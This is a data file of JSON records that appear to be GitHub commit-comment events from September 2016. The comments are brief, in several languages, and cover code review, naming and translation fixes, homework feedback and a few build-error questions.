{"id":"4581313676","type":"CommitCommentEvent","actor":{"login":"twilightsay"},"repo":{"name":"twilightsay/twilightsay.github.io"},"payload":{"comment":{"id":19073629,"position":5,"line":54,"path":"index.html","commit_id":"03266efec08b7c05e27c83b29974538c0bb61b52","created_at":"2016-09-19T04:14:07Z","updated_at":"2016-09-19T04:14:07Z","body":"新"}},"created_at":"2016-09-19T04:14:07Z"}
{"id":"4581314344","type":"CommitCommentEvent","actor":{"login":"kuzkok"},"repo":{"name":"Flexberry/ember-flexberry-gis"},"payload":{"comment":{"id":19073630,"position":2,"line":2,"path":"addon/components/base-control.js","commit_id":"301ce7ad298f29982321e11283dbd452228b4878","created_at":"2016-09-19T04:14:30Z","updated_at":"2016-09-19T04:14:30Z","body":"but why?"}},"created_at":"2016-09-19T04:14:30Z"}
{"id":"4581314843","type":"CommitCommentEvent","actor":{"login":"toshieeeee"},"repo":{"name":"toshieeeee/system_vending_machine"},"payload":{"comment":{"id":19073631,"position":null,"line":null,"path":null,"commit_id":"ede2d418831fb066176cce110e7ce5f4c4506f67","created_at":"2016-09-19T04:14:47Z","updated_at":"2016-09-19T04:14:47Z","body":"\r\n・header関数の修正 / DONE\r\n→なんかheader() の前に、echoで文字出力していたのが、エラーの原因っぽい\r\n\r\n・クエリの実行を、IF文の中に書く / DONE\r\n\r\n・論理演算子をコーディング規約に則る。\r\n\r\n・クエリ（INSERT / UPDATE）実行の後に"}},"created_at":"2016-09-19T04:14:47Z"}
{"id":"4581318205","type":"CommitCommentEvent","actor":{"login":"chansung18"},"repo":{"name":"chansung18/to_do_app"},"payload":{"comment":{"id":19073634,"position":14,"line":19,"path":"Dolist+CoreDataProperties.swift","commit_id":"39fed438f6849f6ea31db01457dcb68dab25601d","created_at":"2016-09-19T04:16:46Z","updated_at":"2016-09-19T04:16:46Z","body":"naming correction\r\n"}},"created_at":"2016-09-19T04:16:46Z"}
{"id":"4581318972","type":"CommitCommentEvent","actor":{"login":"chansung18"},"repo":{"name":"chansung18/to_do_app"},"payload":{"comment":{"id":19073635,"position":18,"line":22,"path":"Dolist+CoreDataProperties.swift","commit_id":"39fed438f6849f6ea31db01457dcb68dab25601d","created_at":"2016-09-19T04:17:12Z","updated_at":"2016-09-19T04:17:12Z","body":"naming correction"}},"created_at":"2016-09-19T04:17:12Z"}
{"id":"4581323194","type":"CommitCommentEvent","actor":{"login":"DyncEric"},"repo":{"name":"AnyRTC/AnyRTC-RTMP"},"payload":{"comment":{"id":19073646,"position":null,"line":null,"path":null,"commit_id":"87117a03acb57a3f1714ad91086e4b28c9d155f2","created_at":"2016-09-19T04:19:41Z","updated_at":"2016-09-19T04:19:41Z","body":"iOS Project"}},"created_at":"2016-09-19T04:19:41Z"}
{"id":"4581325074","type":"CommitCommentEvent","actor":{"login":"sirDonovan"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19073649,"position":null,"line":null,"path":null,"commit_id":"6b4eaf94224c8c1bbf3019a3589e4b495c6fe8cb","created_at":"2016-09-19T04:20:46Z","updated_at":"2016-09-19T04:20:46Z","body":"Some staff are suggesting we disallow the spammy commands like <code>/othermetas</code>, <code>/formathelp</code>, <code>/roomhelp</code>, etc."}},"created_at":"2016-09-19T04:20:46Z"}
{"id":"4581325709","type":"CommitCommentEvent","actor":{"login":"jbriswalter"},"repo":{"name":"PHPBoost/PHPBoost"},"payload":{"comment":{"id":19073650,"position":4,"line":74,"path":"forum/lang/english/forum_english.php","commit_id":"6cfe5ac3c5d903e26e96f2f79a6f13dc7951d333","created_at":"2016-09-19T04:21:08Z","updated_at":"2016-09-19T04:21:08Z","body":"A remplacer par \"Messages without answer\""}},"created_at":"2016-09-19T04:21:08Z"}
{"id":"4581326131","type":"CommitCommentEvent","actor":{"login":"jbriswalter"},"repo":{"name":"PHPBoost/PHPBoost"},"payload":{"comment":{"id":19073651,"position":4,"line":39,"path":"forum/lang/english/common.php","commit_id":"6cfe5ac3c5d903e26e96f2f79a6f13dc7951d333","created_at":"2016-09-19T04:21:21Z","updated_at":"2016-09-19T04:21:21Z","body":"A remplacer par \"Topics without answer\""}},"created_at":"2016-09-19T04:21:21Z"}
{"id":"4581326910","type":"CommitCommentEvent","actor":{"login":"jbriswalter"},"repo":{"name":"PHPBoost/PHPBoost"},"payload":{"comment":{"id":19073652,"position":4,"line":39,"path":"forum/lang/french/common.php","commit_id":"6cfe5ac3c5d903e26e96f2f79a6f13dc7951d333","created_at":"2016-09-19T04:21:52Z","updated_at":"2016-09-19T04:21:52Z","body":"A remplacer par \"Sujets sans réponse\""}},"created_at":"2016-09-19T04:21:52Z"}
{"id":"4581328230","type":"CommitCommentEvent","actor":{"login":"TotalVerb"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19073656,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-19T04:22:35Z","updated_at":"2016-09-19T04:22:35Z","body":"@tkelman I don't think #18467 is the cause of most of these regressions. Could be the other two; #18493 is just lowering, so it's unlikely. #18520 affects codegen and is more likely. It might also be #18519."}},"created_at":"2016-09-19T04:22:35Z"}
{"id":"4581328940","type":"CommitCommentEvent","actor":{"login":"JeffsanC"},"repo":{"name":"JeffsanC/jeffsanc.github.io"},"payload":{"comment":{"id":19073658,"position":null,"line":null,"path":null,"commit_id":"7d6712efd434a3c8497d75abd37fbb920620fbd0","created_at":"2016-09-19T04:22:58Z","updated_at":"2016-09-19T04:22:58Z","body":"……..\r\n\r\nFrom: Li-Kezhi <notifications@github.com<mailto:notifications@github.com>>\r\nReply-To: \"JeffsanC/jeffsanc.github.io\" <reply@reply.github.com<mailto:reply@reply.github.com>>\r\nDate: Sunday, 18 September 2016 at 23:51\r\nTo: \"JeffsanC/jeffsanc.github.io\" <jeffsanc.github.io@noreply.github.com<mailto:jeffsanc.github.io@noreply.github.com>>\r\nSubject: Re: [JeffsanC/jeffsanc.github.io] Update index.html (7d6712e)\r\n\r\n\r\nYour js should be put inside <head></head>.\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/JeffsanC/jeffsanc.github.io/commit/7d6712efd434a3c8497d75abd37fbb920620fbd0#commitcomment-19071124>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AISuzILKbGNc6WPTsdBMhH43Nvx9gRJQks5qrV4HgaJpZM4J_72h>.\r\n"}},"created_at":"2016-09-19T04:22:58Z"}
{"id":"4581330287","type":"CommitCommentEvent","actor":{"login":"luizperes"},"repo":{"name":"quack/quack"},"payload":{"comment":{"id":19073660,"position":null,"line":null,"path":null,"commit_id":"dc94a93881fbab00177ecfa38234d9ccf98e1acc","created_at":"2016-09-19T04:23:45Z","updated_at":"2016-09-19T04:23:45Z","body":"o////"}},"created_at":"2016-09-19T04:23:45Z"}
{"id":"4581331560","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19073661,"position":null,"line":null,"path":null,"commit_id":"95f92dd661f4b53709982c89c9aa8f6c8daba411","created_at":"2016-09-19T04:24:30Z","updated_at":"2016-09-19T04:24:30Z","body":"Стало ОК"}},"created_at":"2016-09-19T04:24:30Z"}
{"id":"4581332091","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19073663,"position":4,"line":80,"path":"gwt-material/src/main/java/gwt/material/design/client/constants/CssName.java","commit_id":"6f8187f89d063bfe14dc259a7aaa203a593dbe4f","created_at":"2016-09-19T04:24:47Z","updated_at":"2016-09-19T04:24:47Z","body":"Should follow CSS standard of `-` rather than `_`."}},"created_at":"2016-09-19T04:24:47Z"}
{"id":"4581333851","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073667,"position":23,"line":19,"path":"homework_4_15.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:25:49Z","updated_at":"2016-09-19T04:25:49Z","body":"Оператор = генерируется компилятором для любой структуры, как и конструктор по-умолчанию, конструктор копирования и деструктор.\r\nЧтобы можно было присваивать объекты структур или вообще их создаватьб"}},"created_at":"2016-09-19T04:25:49Z"}
{"id":"4581335019","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073668,"position":16,"line":53,"path":"homework_4_02.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:26:30Z","updated_at":"2016-09-19T04:26:30Z","body":"функция должна что-то вернуть в этом случае. Сейчас она возвращает неопределенное значение"}},"created_at":"2016-09-19T04:26:30Z"}
{"id":"4581335508","type":"CommitCommentEvent","actor":{"login":"mabyung"},"repo":{"name":"MrChoiSSi/gebsikler"},"payload":{"comment":{"id":19073669,"position":null,"line":null,"path":null,"commit_id":"8415994b64307f7449a7cc25cb1ba7bb140fe4e0","created_at":"2016-09-19T04:26:47Z","updated_at":"2016-09-19T04:26:47Z","body":"commit"}},"created_at":"2016-09-19T04:26:47Z"}
{"id":"4581335530","type":"CommitCommentEvent","actor":{"login":"KrasnayaPloshchad"},"repo":{"name":"l10n-tw/cwtex-q-fonts"},"payload":{"comment":{"id":19073670,"position":null,"line":null,"path":null,"commit_id":"5588a38e2ecf9b7c462d14383f118a1e261fe1ba","created_at":"2016-09-19T04:26:48Z","updated_at":"2016-09-19T04:26:48Z","body":"備考：http://www.kangxizidian.com/"}},"created_at":"2016-09-19T04:26:48Z"}
{"id":"4581336073","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073672,"position":38,"line":65,"path":"homework_4_02.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:27:03Z","updated_at":"2016-09-19T04:27:03Z","body":"функция должна что-то вернуть"}},"created_at":"2016-09-19T04:27:03Z"}
{"id":"4581336610","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073676,"position":16,"line":59,"path":"homework_4_03.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:27:18Z","updated_at":"2016-09-19T04:27:18Z","body":"функция должна что-то вернуть"}},"created_at":"2016-09-19T04:27:18Z"}
{"id":"4581336745","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073677,"position":38,"line":71,"path":"homework_4_03.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:27:23Z","updated_at":"2016-09-19T04:27:23Z","body":"функция должна что-то вернуть"}},"created_at":"2016-09-19T04:27:23Z"}
{"id":"4581338617","type":"CommitCommentEvent","actor":{"login":"NickolasDePiton"},"repo":{"name":"TAHK6e3TOPMO3OB/STACK"},"payload":{"comment":{"id":19073687,"position":null,"line":null,"path":null,"commit_id":"0d8bcbc37f1a5affa52c989cce357ba7c7598dd4","created_at":"2016-09-19T04:28:31Z","updated_at":"2016-09-19T04:28:31Z","body":"Избавился от дублирования в методе push"}},"created_at":"2016-09-19T04:28:31Z"}
{"id":"4581340456","type":"CommitCommentEvent","actor":{"login":"daltones"},"repo":{"name":"cryptocoinjs/base-x"},"payload":{"comment":{"id":19073692,"position":6,"line":24,"path":"README.md","commit_id":"5301d72376472dbea1600c9e486dd3d365fe4026","created_at":"2016-09-19T04:29:36Z","updated_at":"2016-09-19T04:29:36Z","body":"How about rewrite this as `Buffer.from(decoded)`?\r\n\r\n`new Buffer(array)` is deprecated (https://nodejs.org/api/buffer.html#buffer_new_buffer_array)."}},"created_at":"2016-09-19T04:29:36Z"}
{"id":"4581340508","type":"CommitCommentEvent","actor":{"login":"NickolasDePiton"},"repo":{"name":"NickolasDePiton/Stack"},"payload":{"comment":{"id":19073694,"position":null,"line":null,"path":null,"commit_id":"4b5cbeb3f42788b87475ee5badc233f81bb948df","created_at":"2016-09-19T04:29:37Z","updated_at":"2016-09-19T04:29:37Z","body":"Избавился от дублирования в методе push"}},"created_at":"2016-09-19T04:29:37Z"}
{"id":"4581341456","type":"CommitCommentEvent","actor":{"login":"peddadabrp"},"repo":{"name":"peddadabrp/integrations"},"payload":{"comment":{"id":19073696,"position":null,"line":null,"path":null,"commit_id":"deb5df8b5b768fea01c3788bb62b7306cf6cf894","created_at":"2016-09-19T04:30:09Z","updated_at":"2016-09-19T04:30:09Z","body":"approved"}},"created_at":"2016-09-19T04:30:09Z"}
{"id":"4581341880","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073697,"position":10,"line":8,"path":"homework_4_15.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:30:22Z","updated_at":"2016-09-19T04:30:22Z","body":"Вы передаете объекты типа String в функцию по-значению. В каждом объекте расположен массив в 64-чара. У вас создаются локальные копии этих объектов, у которых есть поля char str[64] - это копии указателей str из оригинальных объектов. Таким образом, у вас внутри функции порождается по новому указателю на один и тот же массив.\r\n\r\nЭто для информации ^__^"}},"created_at":"2016-09-19T04:30:22Z"}
{"id":"4581345418","type":"CommitCommentEvent","actor":{"login":"xiaozhu99"},"repo":{"name":"xiaozhu99/flow.ci"},"payload":{"comment":{"id":19073703,"position":null,"line":null,"path":null,"commit_id":"5a2092ca77922769bee6f95e5df869b9ad480527","created_at":"2016-09-19T04:32:22Z","updated_at":"2016-09-19T04:32:22Z","body":"5a2092ca77922769bee6f95e5df869b9ad480527"}},"created_at":"2016-09-19T04:32:22Z"}
{"id":"4581346970","type":"CommitCommentEvent","actor":{"login":"AssF1234"},"repo":{"name":"ir0n1c/ir0n1c-nojb"},"payload":{"comment":{"id":19073708,"position":3,"line":3,"path":"stylesheets/github-light.css","commit_id":"5742149dc63309beec29374bf7406f547c64afde","created_at":"2016-09-19T04:33:16Z","updated_at":"2016-09-19T04:33:16Z","body":"cydia"}},"created_at":"2016-09-19T04:33:16Z"}
{"id":"4581346997","type":"CommitCommentEvent","actor":{"login":"rockjing"},"repo":{"name":"thx/kslite"},"payload":{"comment":{"id":19073709,"position":null,"line":null,"path":null,"commit_id":"4615296434b547e4bd1b445ec6d3551efb42fc2f","created_at":"2016-09-19T04:33:17Z","updated_at":"2016-09-19T04:33:17Z","body":"似乎是前端的东西。\r\n能具体说明一下应用场景么？"}},"created_at":"2016-09-19T04:33:17Z"}
{"id":"4581347260","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073710,"position":9,"line":9,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T04:33:26Z","updated_at":"2016-09-19T04:33:26Z","body":"这个问题深究他的根源：和我的设计思路相关---本来打算MVC，但是优化的时候按着自己的思路把数据层是分离出来了，但是C层与V层的思想不太了解，但是这时我没有查资料，而是按照自己的想法写了，写着写着，我发现我的思路就不明确了。。。\r\n>1、模型（Model） \r\n>模型是应用程序的主体部分。模型表示业务数据，或者业务逻辑. \r\n>2、视图（View） \r\n>视图是应用程序中用户界面相关的部分，是用户看到并与之交互的界面。 \r\n>3、控制器（controller) \r\n>控制器工作就是根据用户的输入，控制用户界面数据显示和更新model对象状态。 \r\n\r\n这时我就想：map层的作用是生成地图对象，地图相关事件，而DOM对象是从view.js传过来的。【这应该也不是正确的MVC思想】我越写越觉得map层与DOM的关联性很强，并且复用性也很小，所以从对象外面传入DOM对象就显得意义不大了，我就放弃了在MonitoringMap对象中传DOM的这种想法，但是忘了删掉这个`$mod`。\r\n最根本的原因是因为我没有理解MVC思想，然后没有理顺优化思路，然后就优化了，到了半截又没了退路（没时间了。。。），只能这样写了。"}},"created_at":"2016-09-19T04:33:26Z"}
{"id":"4581347401","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"cryptocoinjs/base-x"},"payload":{"comment":{"id":19073711,"position":6,"line":24,"path":"README.md","commit_id":"5301d72376472dbea1600c9e486dd3d365fe4026","created_at":"2016-09-19T04:33:31Z","updated_at":"2016-09-19T04:33:31Z","body":"@daltones because that would break previous versions?"}},"created_at":"2016-09-19T04:33:31Z"}
{"id":"4581349036","type":"CommitCommentEvent","actor":{"login":"jayfujii"},"repo":{"name":"jayfujii/Past-assignments"},"payload":{"comment":{"id":19073716,"position":null,"line":null,"path":null,"commit_id":"3fbee4f1795a2d198d5681cd4c8017d535b43fe0","created_at":"2016-09-19T04:34:30Z","updated_at":"2016-09-19T04:34:30Z","body":"Assignment where I had to write C functions to execute binary code generated by a LC‐3 assembler. The program opens a .obj file, reads the contents and then performs the tasks specified within the file."}},"created_at":"2016-09-19T04:34:30Z"}
{"id":"4581349767","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"cryptocoinjs/base-x"},"payload":{"comment":{"id":19073717,"position":6,"line":24,"path":"README.md","commit_id":"5301d72376472dbea1600c9e486dd3d365fe4026","created_at":"2016-09-19T04:34:57Z","updated_at":"2016-09-19T04:34:57Z","body":"Oh wait, this is the README, ha. Sure."}},"created_at":"2016-09-19T04:34:57Z"}
{"id":"4581354419","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"simon-k3/ITStep_Lesson_4"},"payload":{"comment":{"id":19073724,"position":40,"line":30,"path":"homework_4_15.cpp","commit_id":"3422ecd29f1859cfce7d23e67c6560d991d73f4c","created_at":"2016-09-19T04:37:38Z","updated_at":"2016-09-19T04:37:38Z","body":"Вы уже знаете, как напечатать адрес в указателе  - через %p. В дополнение к сказанному выше о структурах, посмотрите адрес массива str[64] в функции operator >, когда вы передаете объект структуры по значению. Т.е. сравните адрес массива внешнего объекта и адрес массива внутреннего и убедитесь в наличии копирования.\r\n\r\nА вот здесь копирования по стандарту нет, как было сказано."}},"created_at":"2016-09-19T04:37:38Z"}
{"id":"4581355061","type":"CommitCommentEvent","actor":{"login":"shaaquir"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19073725,"position":255,"line":255,"path":"Translations/Interface/Turkish.json","commit_id":"dabacd3d99e706ab2370a41662c4d66d073dc4e9","created_at":"2016-09-19T04:38:02Z","updated_at":"2016-09-19T04:38:02Z","body":"tür"}},"created_at":"2016-09-19T04:38:02Z"}
{"id":"4581355398","type":"CommitCommentEvent","actor":{"login":"howtonotwin"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19073727,"position":16,"line":77,"path":"src/main/java/vazkii/botania/client/core/handler/ColorHandler.java","commit_id":"d2e79ca46f7bbb8dde890c013cfe6dcdb2bc02c8","created_at":"2016-09-19T04:38:15Z","updated_at":"2016-09-19T04:38:15Z","body":"Why do this when we can get the EnumDyeColor` directly from the `IBlockState`'s properties?"}},"created_at":"2016-09-19T04:38:15Z"}
{"id":"4581356039","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073729,"position":12,"line":12,"path":"1.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:38:40Z","updated_at":"2016-09-19T04:38:40Z","body":"лишние пробелки ^__^"}},"created_at":"2016-09-19T04:38:40Z"}
{"id":"4581357037","type":"CommitCommentEvent","actor":{"login":"afeld"},"repo":{"name":"justinabrahms/jlilly-bashy-dotfiles"},"payload":{"comment":{"id":19073731,"position":10,"line":231,"path":".bash_profile","commit_id":"04899f005397499e89da6d562b062545e70d7975","created_at":"2016-09-19T04:39:14Z","updated_at":"2016-09-19T04:39:14Z","body":"I went a step further than @scharron's suggestion, and made a script that assumes you will want a virtual environment anytime you see a `requirements.txt` file.\r\n\r\nhttps://gist.github.com/afeld/4aefc7c9493f1519e141f52b40dc6479\r\n\r\nWould love feedback!"}},"created_at":"2016-09-19T04:39:14Z"}
{"id":"4581357548","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19073733,"position":4,"line":80,"path":"gwt-material/src/main/java/gwt/material/design/client/constants/CssName.java","commit_id":"6f8187f89d063bfe14dc259a7aaa203a593dbe4f","created_at":"2016-09-19T04:39:32Z","updated_at":"2016-09-19T04:39:32Z","body":"Oh sorry that's a typo"}},"created_at":"2016-09-19T04:39:32Z"}
{"id":"4581357823","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073735,"position":16,"line":16,"path":"1.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:39:42Z","updated_at":"2016-09-19T04:39:42Z","body":"функция sqrt() уже есть в math.h и означает извлечение квадратного корня. Вы создали свою функцию с совершенно другой семантикой - решение квадратного уравнения. Название функции в итоге запутывает. ЛУчше переименовать в solve()"}},"created_at":"2016-09-19T04:39:42Z"}
{"id":"4581358342","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073737,"position":15,"line":15,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:40:01Z","updated_at":"2016-09-19T04:40:01Z","body":"по английски будет \"average\""}},"created_at":"2016-09-19T04:40:01Z"}
{"id":"4581359514","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073741,"position":31,"line":31,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:40:43Z","updated_at":"2016-09-19T04:40:43Z","body":"нужны пробелы вокрут операторов, пробел между ) и {. и лучше префиксный инкремент"}},"created_at":"2016-09-19T04:40:43Z"}
{"id":"4581359569","type":"CommitCommentEvent","actor":{"login":"ksss"},"repo":{"name":"ruby/spec"},"payload":{"comment":{"id":19073742,"position":null,"line":null,"path":null,"commit_id":"d05fabfe0ba3774710d912d2802d6d235c1ed8ae","created_at":"2016-09-19T04:40:45Z","updated_at":"2016-09-19T04:40:45Z","body":"awesome!"}},"created_at":"2016-09-19T04:40:45Z"}
{"id":"4581359856","type":"CommitCommentEvent","actor":{"login":"mnrname"},"repo":{"name":"nhanh2301/codeigniter-ecommerce"},"payload":{"comment":{"id":19073743,"position":null,"line":null,"path":null,"commit_id":"77ab312c1df74fc55b3f5a82725110c776f79496","created_at":"2016-09-19T04:40:55Z","updated_at":"2016-09-19T04:40:55Z","body":"\r\nParse error: syntax error, unexpected 'public' (T_PUBLIC) in /opt/lampp/htdocs/shop/application/helpers/site_helper.php on line 103\r\nA PHP Error was encountered\r\n\r\nSeverity: Parsing Error\r\n\r\nMessage: syntax error, unexpected 'public' (T_PUBLIC)\r\n\r\nFilename: helpers/site_helper.php\r\n\r\nLine Number: 103\r\n\r\nBacktrace:\r\n\r\n\r\n\r\nHow to fix this?"}},"created_at":"2016-09-19T04:40:55Z"}
{"id":"4581360070","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073745,"position":29,"line":29,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:41:01Z","updated_at":"2016-09-19T04:41:01Z","body":"после запятой нужен пробел.\r\n\r\ntemplate<> пишется над функцией"}},"created_at":"2016-09-19T04:41:01Z"}
{"id":"4581360546","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073746,"position":35,"line":35,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:41:18Z","updated_at":"2016-09-19T04:41:18Z","body":"нужен пробел вокруг деления"}},"created_at":"2016-09-19T04:41:18Z"}
{"id":"4581361343","type":"CommitCommentEvent","actor":{"login":"roxma"},"repo":{"name":"roxma/vim-tweak"},"payload":{"comment":{"id":19073747,"position":5,"line":9,"path":"autoload/tweak/wtb_switch.vim","commit_id":"53e8e54748ab22e3b93617d3122facde77616120","created_at":"2016-09-19T04:41:52Z","updated_at":"2016-09-19T04:41:52Z","body":"Oh. `tabpagenr(\"$\")`  is simpler, Mine is an over-complicated.\r\nThere's no other consideration. Thx."}},"created_at":"2016-09-19T04:41:52Z"}
{"id":"4581363888","type":"CommitCommentEvent","actor":{"login":"AssF1234"},"repo":{"name":"ir0n1c/ir0n1c-nojb"},"payload":{"comment":{"id":19073751,"position":null,"line":null,"path":null,"commit_id":"4e53592353514f84ea22c8400e22eca008d08127","created_at":"2016-09-19T04:43:27Z","updated_at":"2016-09-19T04:43:27Z","body":"https://github.com/ir0n1c/ir0n1c-nojb/commit/4e53592353514f84ea22c8400e22eca008d08127#diff-c95746e7c73088d9b8db98b3f50d537f"}},"created_at":"2016-09-19T04:43:27Z"}
{"id":"4581366460","type":"CommitCommentEvent","actor":{"login":"daltones"},"repo":{"name":"cryptocoinjs/base-x"},"payload":{"comment":{"id":19073757,"position":6,"line":24,"path":"README.md","commit_id":"5301d72376472dbea1600c9e486dd3d365fe4026","created_at":"2016-09-19T04:44:56Z","updated_at":"2016-09-19T04:44:56Z","body":";)"}},"created_at":"2016-09-19T04:44:56Z"}
{"id":"4581371829","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073772,"position":30,"line":30,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:48:03Z","updated_at":"2016-09-19T04:48:03Z","body":"в этой задаче из-за шаблонности много нюансов.\r\nНапример, T sum = 0. означает, что число 0 - это допустимое значение для типа Т. Т.е. неявно предполагается, что тип Т - числовой. Но это может быть и Point, и что угодно. Но сумму нужно начинать с какого-то \"значения по умолчанию\" для типа Т.\r\n\r\nЗначение по умолчанию будет у переменной вследствие работы конструктора по-умолчанию, если тип Т - это структрура. В обзем виде, получить значение по-умолчнию можно так:\r\n\r\nТ sum;\r\n"}},"created_at":"2016-09-19T04:48:03Z"}
{"id":"4581372864","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073777,"position":null,"line":null,"path":null,"commit_id":"0c3b0605a5611769ab2292e38b20d91a8e2611a4","created_at":"2016-09-19T04:48:36Z","updated_at":"2016-09-19T04:48:36Z","body":"#11 Adding log in functionality"}},"created_at":"2016-09-19T04:48:36Z"}
{"id":"4581372966","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073778,"position":32,"line":32,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:48:40Z","updated_at":"2016-09-19T04:48:40Z","body":"На тип Т накладываются ограничания - должны быть определены оператора + и /"}},"created_at":"2016-09-19T04:48:40Z"}
{"id":"4581374235","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"khomkas-itstep/ITStep_Control_3"},"payload":{"comment":{"id":19073782,"position":35,"line":35,"path":"2.cpp","commit_id":"d1c6a0aa592bd36118e87ec43b6429a418c544f1","created_at":"2016-09-19T04:49:24Z","updated_at":"2016-09-19T04:49:24Z","body":"Причем оператор / должен быть определен как деление объекта типа Т на число int N !\r\n\r\nT operator / (T x, int N);"}},"created_at":"2016-09-19T04:49:24Z"}
{"id":"4581374621","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073784,"position":null,"line":null,"path":null,"commit_id":"f4b796cf83ecd6d18f95eda6b07e09de26c9e889","created_at":"2016-09-19T04:49:38Z","updated_at":"2016-09-19T04:49:38Z","body":"#20 Only view the jobs that belong to you"}},"created_at":"2016-09-19T04:49:38Z"}
{"id":"4581374911","type":"CommitCommentEvent","actor":{"login":"LSS-bin"},"repo":{"name":"LSS-bin/ossexample"},"payload":{"comment":{"id":19073785,"position":null,"line":null,"path":null,"commit_id":"fcefed63612a2095c25c44051149fced409028e4","created_at":"2016-09-19T04:49:46Z","updated_at":"2016-09-19T04:49:46Z","body":"no folder!"}},"created_at":"2016-09-19T04:49:46Z"}
{"id":"4581375995","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073789,"position":52,"line":52,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T04:50:26Z","updated_at":"2016-09-19T04:50:26Z","body":"这样写是受移动端影响，觉得这样写逻辑挺清楚地。"}},"created_at":"2016-09-19T04:50:26Z"}
{"id":"4581376235","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073790,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T04:50:34Z","updated_at":"2016-09-19T04:50:34Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T04:50:34Z"}
